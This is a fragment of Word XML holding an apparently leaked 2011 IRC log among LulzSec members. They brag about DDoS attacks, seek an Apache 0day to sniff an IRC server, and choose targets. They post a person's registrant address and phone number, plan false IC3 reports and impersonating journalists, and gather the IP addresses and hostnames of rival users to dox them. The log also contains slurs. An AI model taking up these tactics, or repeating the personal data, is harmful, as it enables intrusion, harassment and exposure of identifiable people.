      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:49:04 storm rofl Jun 01 02:49:20 Topiary storm: this is the dude that claims to have DDoS'd WikiLeaks Jun 01 02:49:30 storm nice Jun 01 02:49:38 Topiary speaking of, did you guys know WikiLeaks tweeted our PBS Tupac story?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:49:46 storm yes Jun 01 02:49:48 storm i was around Jun 01 02:49:49 storm :) Jun 01 02:51:03 storm this guy has a lot of crying posts Jun 01 02:52:33 Topiary aye he's a barrel of joy Jun 01 02:52:56 storm awinee Awinee Jun 01 02:52:56 storm @ Jun 01 02:52:56 storm @maxxmac1 @LulzSec my loic broke so i stopped for the night. Happy playing Jun 01 02:53:15 storm is that the windows dos tool he showed to cameras? Jun 01 02:53:36 Topiary that was HOIC, he fired it at his own government from his home IP Jun 01 02:53:41 Topiary to "test" it Jun 01 02:53:49 storm lmfao Jun 01 02:53:58 storm terrible Jun 01 02:54:03 Topiary Jester's DoS tool = Apache 0day + slowloris + Tor Jun 01 02:54:17 storm my dos tool is over ten years old and at least it spoofs Jun 01 02:54:28 storm ;p Jun 01 02:54:36 Topiary naturally you are a sexy beast Jun 01 02:54:41 storm :D Jun 01 02:55:55 Topiary tl;dr on awinee - he's insanely lonely/ugly so even treats our mockery as a sign of attention Jun 01 02:56:09 storm hahaha Jun 01 02:56:16 Topiary tl;dr on Jester - pompous elitism-fueling blogger with Tor Jun 01 02:56:21 Topiary tl;dr on the rest of them - sheep Jun 01 02:56:58 storm i use tor to ssh out ;d does theeze make me leet? Jun 01 02:57:16 Topiary yes it does Jun 01 02:57:37 lol no it makes you a ver patient person :O Jun 01 02:57:46 lol SSH over TOR is looooooooooooooooooow xD Jun 01 02:57:52 lol very* Jun 01 02:58:00 storm rofl Jun 01 02:58:00 storm dude Jun 01 02:58:02 storm i agree Jun 01 02:58:06 storm tor is slow as balls Jun 01 02:58:10 storm btw Jun 01 02:58:12 storm FailSec?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:58:15 storm wtf is this shit Jun 01 02:58:21 Topiary storm, we've had stalkers like that for months Jun 01 02:58:24 Topiary they follow us everywhere we go Jun 01 02:58:27 Topiary they monitor everything we do Jun 01 02:58:31 Topiary they make parodies of all our accounts Jun 01 02:58:33 Topiary we're kind of like a rock band Jun 01 02:58:36 Topiary as someone put it Jun 01 02:58:53 storm lmfao Jun 01 02:59:27 lol it's got tht bad attentions seeking Adrian lamo wen't and reg'd lulzsec.com proberbly so onw day somone whois it out of curiosity and sees his name so he can get a mention lol Jun 01 02:59:41 lol even on his site, he had links to google searches of himself Jun 01 02:59:46 Topiary guys did you see Adrien tweeted us insulting shit? Jun 01 02:59:54 storm well Jun 01 02:59:58 storm i can get you guys Jun 01 02:59:58 lol i dont think he's ever hacked anything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03:00:02 storm lulsec.lulz.net Jun 01 03:00:10 storm or sec.lulz.net Jun 01 03:00:11 storm or whatever Jun 01 03:00:22 Topiary we're working on a website at the moment Jun 01 03:00:28 Topiary 'sides we already has haz.lulz.net Jun 01 03:00:41 Topiary I will show you the design for the site so far Jun 01 03:00:46 storm you have access to lulz.net?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:00:53 storm my friend owns it &gt;:| Jun 01 03:01:15 [redacted] lulz.net is ran by furrys Jun 01 03:01:18 [redacted] yiff in hell Jun 01 03:01:18 [redacted] :] Jun 01 03:01:45 Topiary http://i.imgur.com/dFaz0.jpg banner at the top links to whatever, rest is just background (including rainbow) Jun 01 03:01:45 storm wat Jun 01 03:01:49 Topiary it's in progress etc Jun 01 03:01:53 lol im a furry im sat here in my fur suit :D Jun 01 03:02:02 [redacted] oh you troll :D Jun 01 03:02:37 storm FailSec The Fail Boat Jun 01 03:02:37 storm @ Jun 01 03:02:37 storm @awinee @LulzSec so ok i ran this thing but nothing happened, wth chinese pirates are killing my cuban refugees!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:02:43 storm is he talking about my ddoses?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:02:48 storm cause i hit from chinese boxes Jun 01 03:02:50 storm lol Jun 01 03:03:15 Topiary nah they don't know where China is on the map Jun 01 03:03:18 Topiary let alone what a box is Jun 01 03:03:20 storm probably looks like a botnet of china residentals Jun 01 03:03:33 storm ahh Jun 01 03:06:02 storm i guess i put too much credit in people Jun 01 03:06:19 lol i say we just root 2600 and sniff their IRCD for a few month Jun 01 03:06:47 Topiary easier said than don-- wait, you're kayla :x Jun 01 03:06:54 Topiary easier done than said in that case Jun 01 03:06:57 storm i want an apache 0day &gt;:| sniff the fk out of them Jun 01 03:06:58 joepie92 Topiary Jun 01 03:07:05 joepie92 do you has any more screenshots of site design? Jun 01 03:07:16 Topiary not really Jun 01 03:07:17 Topiary why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:07:53 joepie92 because I'm curious :P Jun 01 03:08:49 Topiary only has this other one: http://i.imgur.com/3WpEq.jpg Jun 01 03:08:54 Topiary where the rainbow chills behind and the border is gone Jun 01 03:08:55 joepie92 what the shit - adrian lamo registered lulzsec.com? Jun 01 03:09:16 joepie92 also, Topiary, make the rainbow overlay the page content :3 Jun 01 03:09:32 * devrandom (devrandom@HA-cgq.t9g.4u7qps.IP) has joined #pure-elite Jun 01 03:09:52 Topiary indeed joepie Jun 01 03:09:58 &lt;devrandom&gt; hello folks Jun 01 03:10:09 lol hey :D Jun 01 03:10:16 Topiary and yes he did Jun 01 03:10:19 Topiary http://whois.domaintools.com/lulzsec.com Jun 01 03:10:48 lol im telling you :D Jun 01 03:10:52 lol it's cos he's an attention seeker Jun 01 03:10:54 &lt;devrandom&gt; sorry i haven't been in much ... got a new machine, been working on vm shite Jun 01 03:10:58 lol it's so someone whois it Jun 01 03:11:01 lol and sees his name Jun 01 03:11:05 lol so he gets a mention Jun 01 03:11:06 lol lol Jun 01 03:11:15 lol really do hate ppl like that Jun 01 03:11:52 lol he's never hacked anything, he sat out side of some building cracked their wifi and then went and told them so he could get arrested and get a mention lol Jun 01 03:11:54 lol wtf Jun 01 03:11:54 Topiary the world would be a better place without 2600 ;x Jun 01 03:12:04 lol he has links to google searchs of himself Jun 01 03:12:12 lol he really, really is lonely Jun 01 03:12:43 storm so are they a target aside from just packeting? Jun 01 03:12:59 lol they are complete fair game :) Jun 01 03:13:15 lol the j3st3rs dox would be nice :) Jun 01 03:13:18 Topiary well A) they are a bunch of asshats, B) Jester is a fucktard who *everyone* would want to destroy, C) Apache 0day, D) Adrian needs a spanking Jun 01 03:13:29 joepie92 E) bring the lulz Jun 01 03:13:30 joepie92 :D Jun 01 03:13:35 Topiary yes, that too Jun 01 03:14:44 Topiary ah wait that was Adrian Chen sending us those insulting tweets Jun 01 03:14:47 Topiary both losers Jun 01 03:15:14 storm i like C most of all Jun 01 03:15:15 storm ;x Jun 01 03:15:17 Topiary he tried to arrange an interview with LulzSec, told him to fuck off before Gawker gets rooted Jun 01 03:15:26 Topiary then he tweets us saying PBS hack was stupid Jun 01 03:15:36 lol isn't tht apache 0day pub yet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:15:37 Topiary cuts deep :( Jun 01 03:16:26 storm well if it were public it wouldnt be a 0day anymore Jun 01 03:16:27 storm ;x Jun 01 03:16:34 lol tru :o Jun 01 03:18:03 Topiary (Jester's flavour of choice is Ubuntu, FYI) Jun 01 03:18:18 lol NS History: Jun 01 03:18:18 lol 1 change on 2 unique name servers over 0 year.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:18:18 lol Reverse IP: Jun 01 03:18:18 lol 164,461 other sites hosted on this server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:18:18 lol Log In or Create a FREE account to start monitoring this domain name Jun 01 03:18:18 lol DomainTools for Windows Jun 01 03:18:18 lol Now you can access domain ownership records anytime, anywhere... right from your own desktop! Download Now&gt; Jun 01 03:18:18 lol Domain Name: lulzsec.com Jun 01 03:18:18 lol Registrant Contact: Jun 01 03:18:18 lol Adrian Lamo Jun 01 03:18:18 lol LulzSec LLC Jun 01 03:18:18 lol 108 WEST 13TH STREET Jun 01 03:18:19 lol Wilmington, Delaware 19801-1145 Jun 01 03:18:20 lol US Jun 01 03:18:21 lol +1.8889201981 Jun 01 03:18:53 lol do you think he's tht much of an attention seeker to use his real address?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:19:05 Topiary we could always call his ass Jun 01 03:19:08 lol can someone in the US phone tht number and see if it's really him?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:19:12 Topiary I'll call him Jun 01 03:19:32 lol if so i'll do some ic3 requests as him being the leader of luzsec, he owns the domain afterall Jun 01 03:19:41 joepie92 &gt;LulzSec LLC Jun 01 03:19:42 lol :D Jun 01 03:19:47 Topiary what does he sound like?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:20:02 lol a looser Jun 01 03:20:04 lol xD Jun 01 03:20:10 lol just say you are media Jun 01 03:20:14 lol and you found the domain Jun 01 03:20:20 lol and you'd like to interview him Jun 01 03:20:27 lol feed his need for attention Jun 01 03:20:30 lol :D Jun 01 03:20:30 joepie92 big potential for lulz is big Jun 01 03:20:54 lol yes :D Jun 01 03:20:57 Topiary calling him now Jun 01 03:21:00 Topiary ringring Jun 01 03:21:05 joepie92 Topiary Jun 01 03:21:06 joepie92 skype Jun 01 03:21:06 storm at 3am lol Jun 01 03:21:06 joepie92 :( Jun 01 03:21:08 joepie92 and tinychat Jun 01 03:21:09 lol :3 Jun 01 03:21:16 storm i agree @ skype Jun 01 03:21:16 storm ;x Jun 01 03:21:22 Topiary he's not there, AT&amp;T virtual blahblahblah not available Jun 01 03:21:26 joepie92 lol Jun 01 03:21:33 joepie92 AT&amp;T :o Jun 01 03:21:42 joepie92 didn't we have some... AT&amp;T noms?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:21:50 lol yes :D Jun 01 03:22:06 lol i think it was only their buisnuiess stuff?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:22:09 joepie92 ye Jun 01 03:22:09 joepie92 well Jun 01 03:22:16 joepie92 it wouldnt surprise me Jun 01 03:22:20 joepie92 if Lamo had a business acct Jun 01 03:22:42 joepie92 Topiary.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:22:47 joepie92 someone thinks Avunit is you Jun 01 03:22:54 Topiary someone thinks everyone is me Jun 01 03:22:59 joepie92 lol Jun 01 03:23:04 storm I am Topiary Jun 01 03:23:06 joepie92 http://anons.wikia.com/wiki/Topiary Jun 01 03:23:07 lol even im Topiary :D Jun 01 03:23:11 storm Jun 01 03:23:12 Topiary goddamnit what the fuck is that Jun 01 03:23:13 storm I'm lol too Jun 01 03:23:15 joepie92 Aliases Jun 01 03:23:16 joepie92 Topiary, AVUnit, Whirlpool Jun 01 03:23:18 storm ;d Jun 01 03:23:23 lol this entire channel is Topiary talking to himself :D Jun 01 03:23:28 joepie92 also Jun 01 03:23:30 joepie92 that is a wiki Jun 01 03:23:32 joepie92 with tinychat screencaps Jun 01 03:23:44 joepie92 and small amounts of dox Jun 01 03:23:44 lol screen sessions, screen sessions everywhere Jun 01 03:24:10 Topiary attributes: cautious Jun 01 03:24:15 Topiary what-does-it-mean.avi Jun 01 03:24:28 joepie92 lol Jun 01 03:24:29 joepie92 so Jun 01 03:24:32 joepie92 what I am wondering about Jun 01 03:24:40 joepie92 is why "Homosexual" is not just in the Attributes template Jun 01 03:24:48 joepie92 as 99% of the tinychatfags seems to fit that description Jun 01 03:25:07 Topiary "frequently makes prank calls" Jun 01 03:25:13 Topiary I went on TinyChat one night and did them :( Jun 01 03:25:19 Topiary these guys have done their research!!11 Jun 01 03:25:22 joepie92 lol Jun 01 03:25:24 lol we need to pwn a media/mews company and offer j35t3r an interview see if he bites, see what we can extract out of him?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:25:41 lol pose as media Jun 01 03:25:43 lol :D Jun 01 03:26:00 storm kayla 4 prez Jun 01 03:26:51 Topiary this is worse than the time some faggot did this Jun 01 03:26:52 Topiary http://en.wikipedia.org/wiki/Topiary_%28hacktivist%29 Jun 01 03:26:57 Topiary can we delete this somehow?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:27:21 joepie92 interesting.... the guy who made the wikia one is using anonine Jun 01 03:27:27 lol It's worth noting that he has a particular fondness for bitcoins, and is likely the one who manages the bitcoin donations to LulzSec.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:27:30 storm Not much is known about Corey, except that he uses a voice changer on TinyChat to deepen his voice and the he will incessantly ask to see men's genitals while trying to engage them in the webcam equivalent of phone sex. He seems to be particularly interested in Topiary. Jun 01 03:27:32 storm ROFLMFAO Jun 01 03:27:38 joepie92 and Topiary, you can always play the notability cad Jun 01 03:27:39 joepie92 card* Jun 01 03:27:57 joepie92 if you sound convinced enough that you're not notable Jun 01 03:28:00 joepie92 wikipedo's will remove anything Jun 01 03:28:15 joepie92 storm: fun thing is that's coreys actual voice Jun 01 03:28:15 joepie92 lol Jun 01 03:28:20 joepie92 :D Jun 01 03:28:22 * joepie92 lulz Jun 01 03:28:25 storm xD Jun 01 03:28:29 Topiary who made this Wiki?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:28:36 Topiary because all their facts come from lurking in TinyChat for one night Jun 01 03:28:59 * devrandom has quit (Quit: leaving) Jun 01 03:29:11 lol awinee was braggin about being in a tiny chat on his twitter lol Jun 01 03:29:18 joepie92 HA Jun 01 03:29:19 Topiary yeah he was Jun 01 03:29:20 joepie92 FUCKING MORON Jun 01 03:29:20 joepie92 http://anons.wikia.com/wiki/Special:Contributions/76.106.247.143 Jun 01 03:29:22 joepie92 HAHAHAHA Jun 01 03:29:28 joepie92 c-76-106-247-143.hsd1.fl.comcast.net Jun 01 03:29:31 joepie92 nice vpn bro Jun 01 03:29:34 lol proberbly him, someone shuld include his dox on tht wiki page as supreme anonymous leader Jun 01 03:29:35 Topiary sec Jun 01 03:29:52 lol lol deffinetly not VPN :D Jun 01 03:29:57 lol someone social tht ISP Jun 01 03:29:58 lol :D Jun 01 03:30:12 joepie92 other person uses anonine Jun 01 03:30:24 joepie92 so I guess it's time for some user searching on anonops Jun 01 03:30:25 joepie92 :D Jun 01 03:30:39 Topiary * Asherah (Asherah@93-94-245- 147.dynamic.swissvpn.net) Jun 01 03:30:39 Topiary asherah_ is Asherah@74.115.212.38 * Asherah Jun 01 03:30:39 Topiary * amob (~amob@pool-71-191-255- 116.washdc.fios.verizon.net) Jun 01 03:30:39 Topiary * Cephurs (~wtf@pool-71-126-168- 162.washdc.fios.verizon.net) Jun 01 03:30:39 Topiary cephurs was ~ching@LCaen-156-54-21-76.w80- 11.abo.wanadoo.fr * ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:30:39 Topiary cephurs was ~ching@85.17.254.135 * ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:30:43 Topiary cephurs was ~ching@rainbowwarrior.torservers.net * ... Jun 01 03:30:45 lol fuck if it was road runner i know someone who can fully dox IP -&gt; address name everything Jun 01 03:30:45 Topiary * T71 (T71@66-168-112-216.dhcp.oxfr.ma.charter.com) has joined #jester Jun 01 03:30:47 Topiary === bluesoul120 &lt;~bluesoul@46.20.33.115&gt; ''bluesoul'' Jun 01 03:30:49 Topiary bluesoul120 is ~bluesoul@178.86.6.11 * bluesoul Jun 01 03:30:51 Topiary godbert (~godbert@c-98-250-11- 251.hsd1.mi.comcast.net) has joined #jester Jun 01 03:30:53 Topiary godbert was ~godbert@cpe-68-173-45- 234.nyc.res.rr.com * juevos rancheros Jun 01 03:30:55 Topiary Matches?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:31:24 joepie92 173.244.215.65.static.midphase.com Jun 01 03:31:40 lol c-76-106-247-143.hsd1.fl.comcast.net Jun 01 03:31:40 lol is flordia?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:31:42 joepie92 let me get the other ips Jun 01 03:31:42 joepie92 ya Jun 01 03:31:48 storm i'm in florida Jun 01 03:31:50 storm :O Jun 01 03:31:53 lol :o Jun 01 03:32:16 joepie92 Naam: 76-216-232- 237.lightspeed.sndgca.sbcglobal.net Jun 01 03:32:16 joepie92 Address: 76.216.232.237 Jun 01 03:33:00 joepie92 Naam: 219-89-200-76.adsl.xtra.co.nz Jun 01 03:33:00 joepie92 Address: 219.89.200.76 Jun 01 03:33:57 joepie92 ok Jun 01 03:34:00 joepie92 that's it Jun 01 03:34:05 joepie92 can't see Nonynews' IP Jun 01 03:34:20 joepie92 full list of IPs that have edited the wiki (that are visible) is Jun 01 03:34:20 joepie92 188.126.75.119 Jun 01 03:34:20 joepie92 76.106.247.143 Jun 01 03:34:20 joepie92 173.244.215.65 Jun 01 03:34:20 joepie92 76.216.232.237 Jun 01 03:34:20 joepie92 219.89.200.76 Jun 01 03:37:01 joepie92 whoopsie Jun 01 03:37:03 joepie92 seems I just found a hit Jun 01 03:37:20 joepie92 anyone has any idea how I can see the actual nick connected to an IP?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:37:26 joepie92 /os session only shows the count Jun 01 03:37:59 lol how lol :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:39:19 Topiary 188.126.75.119 Jun 01 03:39:25 Topiary that's StrongVPN Jun 01 03:39:31 Topiary I've used that exact server before Jun 01 03:39:52 lol :O Jun 01 03:39:57 lol then it was YOUUUUUUUUUUUUU Jun 01 03:40:52 joepie92 1 ip matched, but it was kerkun _removing_ shit from the wiki Jun 01 03:40:58 joepie92 so that's not an issue Jun 01 03:41:15 Topiary 219.89.200.76 = Auckland NZ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:41:35 joepie92 Topiary Jun 01 03:41:37 joepie92 that was not strongvpn Jun 01 03:41:39 joepie92 but anonine Jun 01 03:41:54 Topiary are you sure? I've been on the 188.126.* range before on StrongVPN Jun 01 03:42:02 joepie92 C:\Users\ton&gt;nslookup 188.126.75.119 Jun 01 03:42:02 joepie92 Server: google-public-dns-a.google.com Jun 01 03:42:02 joepie92 Address: 8.8.8.8 Jun 01 03:42:02 joepie92 Naam: 75-119.anonymous.at.anonine.com Jun 01 03:42:02 joepie92 Address: 188.126.75.119 Jun 01 03:42:07 Topiary interesting Jun 01 03:42:22 joepie92 might be a shared range Jun 01 03:42:51 joepie92 there's not so many anonine users.... on anonops... Jun 01 03:42:54 joepie92 lemme check for the range Jun 01 03:43:38 Topiary that's Stockholm, Sweden at any rate Jun 01 03:43:53 Topiary thought it was; I should really go back to StrongVPN's Swedish jazz, real fast Jun 01 03:46:03 joepie92 can't find any of the other ranges Jun 01 03:46:04 joepie92 so Jun 01 03:46:05 joepie92 idk Jun 01 03:46:13 joepie92 I'll keep an eye out on these ranges Jun 01 03:47:03 Topiary well judging from reading all of their pages (which I just did), I'd say it's awinee Jun 01 03:47:28 Topiary considering their main base of facts/screenshots comes from TinyChat.com/AnonOpsParty in the last 6 days Jun 01 03:47:40 joepie92 unsure Jun 01 03:47:46 joepie92 it's not just awinee Jun 01 03:47:50 Topiary other nicks: f00, dumb, test, awineecamslut Jun 01 03:47:52 joepie92 that wiki has mention of phenzen being raided Jun 01 03:47:57 joepie92 afaik that was not shared in tinychat Jun 01 03:47:59 Topiary despite my absolute drunkenness, I remember those names trolling Jun 01 03:48:03 joepie92 wait, since when is f00 == awinee?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:48:18 Topiary oh, f00 might not have been trollin' Jun 01 03:48:23 joepie92 f00 is a troll Jun 01 03:48:25 joepie92 he is with ryan Jun 01 03:48:28 joepie92 and is known for fucking shit up Jun 01 03:48:32 Topiary ah, he was in TinyChat Jun 01 03:48:34 joepie92 but afaik it's not awinee Jun 01 03:50:16 Topiary okay well, I'm staying away from TinyChat with those camwhores anyway Jun 01 03:50:23 Topiary Sabu and I got a bit carried away and gave LulzSec away a bit Jun 01 03:51:08 Topiary I'm just assuming it's fakegregghoush + co., they monitor all of Parmy's posts Jun 01 03:51:19 Topiary I used "Whirlpool" in a recent LulzSec interview (the only interview) Jun 01 03:51:24 Topiary with Parmy; their Wiki is updated with it Jun 01 03:53:20 [redacted] mfw joepie's on windows Jun 01 03:59:12 [redacted] http://www.youtube.com/watch?v=Au8LGtxwEO4 Jun 01 03:59:50 lol you know what Jun 01 03:59:57 lol now i think about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04:00:04 lol all these j35tr fags Jun 01 04:00:17 lol are all ppl who've been caught dossing or something Jun 01 04:00:29 lol you think they turned FBI bitch :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 04:00:40 [redacted] its a conspiracy Jun 01 04:01:50 joepie92 yes, joepie is on windows Jun 01 04:01:51 joepie92 because Jun 01 04:01:52 joepie92 my fucking Jun 01 04:01:53 joepie92 router Jun 01 04:01:54 joepie92 is broken Jun 01 04:01:59 joepie92 and refuses to assign an IP to my linux box Jun 01 04:02:02 [redacted] excuses Jun 01 04:02:03 joepie92 no matter what I do Jun 01 04:02:03 [redacted] excuses Jun 01 04:02:13 [redacted] learn to ifconfig :D Jun 01 04:02:22 storm Jun 01 04:02:28 storm Linux nimbus 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux Jun 01 04:02:31 joepie92 [redacted] Jun 01 04:02:35 joepie92 the issue is my routers/modem Jun 01 04:02:43 joepie92 I have a shitty sweex router that never worked properly Jun 01 04:02:47 [redacted] sure right Jun 01 04:02:48 joepie92 a thomson speedtouch modem Jun 01 04:02:51 joepie92 that is shit Jun 01 04:02:52 [redacted] but it somehow synchs with your XP box Jun 01 04:02:55 [redacted] automagically Jun 01 04:03:02 [redacted] over DHCP Jun 01 04:03:02 joepie92 and a sitecom wifi router that has issues with assigning an IP Jun 01 04:03:04 joepie92 eh Jun 01 04:03:07 joepie92 because that always worked Jun 01 04:03:12 joepie92 the wifi issue is only since recently Jun 01 04:03:14 Topiary joepie just likes Windows Jun 01 04:03:18 joepie92 or rather, the IP assignment issue* Jun 01 04:03:42 [redacted] :D Jun 01 04:03:45 storm Windows is rubbish Jun 01 04:03:48 joepie92 it is Jun 01 04:03:51 joepie92 so is speedtouch Jun 01 04:03:56 joepie92 so is sitecom Jun 01 04:04:00 joepie92 and so is especially sweex Jun 01 04:04:08 storm sup m_ Jun 01 04:04:10 storm :) Jun 01 04:04:11 joepie92 I have some of the most retarded network equipment someone can possible have Jun 01 04:04:11 joepie92 -_- Jun 01 04:04:13 joepie92 possibly* Jun 01 04:04:17 [redacted] not much bro :] Jun 01 04:06:23 storm nice Jun 01 04:07:03 [redacted] found a nice lfi on the box we're supposed to migrate too Jun 01 04:07:04 [redacted] lol Jun 01 04:07:25 [redacted] been poking at it Jun 01 04:08:04 storm nice Jun 01 04:08:10 storm AIM for a sec?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
